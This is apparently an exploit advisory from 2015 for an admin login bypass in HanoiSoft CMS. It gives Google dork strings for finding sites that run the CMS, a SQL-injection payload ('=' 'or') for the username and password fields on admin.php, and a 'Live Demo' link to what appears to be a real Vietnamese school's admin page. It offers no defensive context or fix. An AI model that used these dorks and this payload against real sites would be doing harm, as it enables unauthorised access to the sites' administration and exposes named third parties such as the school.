#####################################################################
# Exploit Title: HanoiSoft CMS - Admin ByPass login
# Google Dork:
# + intext:"Ðơn vị thiết kế: Công ty cổ phần phần mềm ứng dụng Hà Nội"
# + intext:"Ðơn vị thiết kế: Công ty HanoiSoft "
# + intext:"Ðơn vị thiết kế: Công ty Hanoisoft."
# Date: 21/6/2015
# Exploit Author: Alexander
# Vendor Homepage: http://www.hanoisoft.com.vn/
# Vulnerability Type : Bypass Login
# Severity : High
# Tested on: Windows 7
#####################################################################
[~] VULNERABILITY}~~
#######################
Site.com/admin.php
[~] EXPLOIT:
##############
User: '=' 'or'
Pass: '=' 'or'
[~] Live Demo:
##############
http://thcsducthuong.hoaiduc.edu.vn/admin.php
#######################
Contact: https://www.facebook.com/AnonTeamX.gov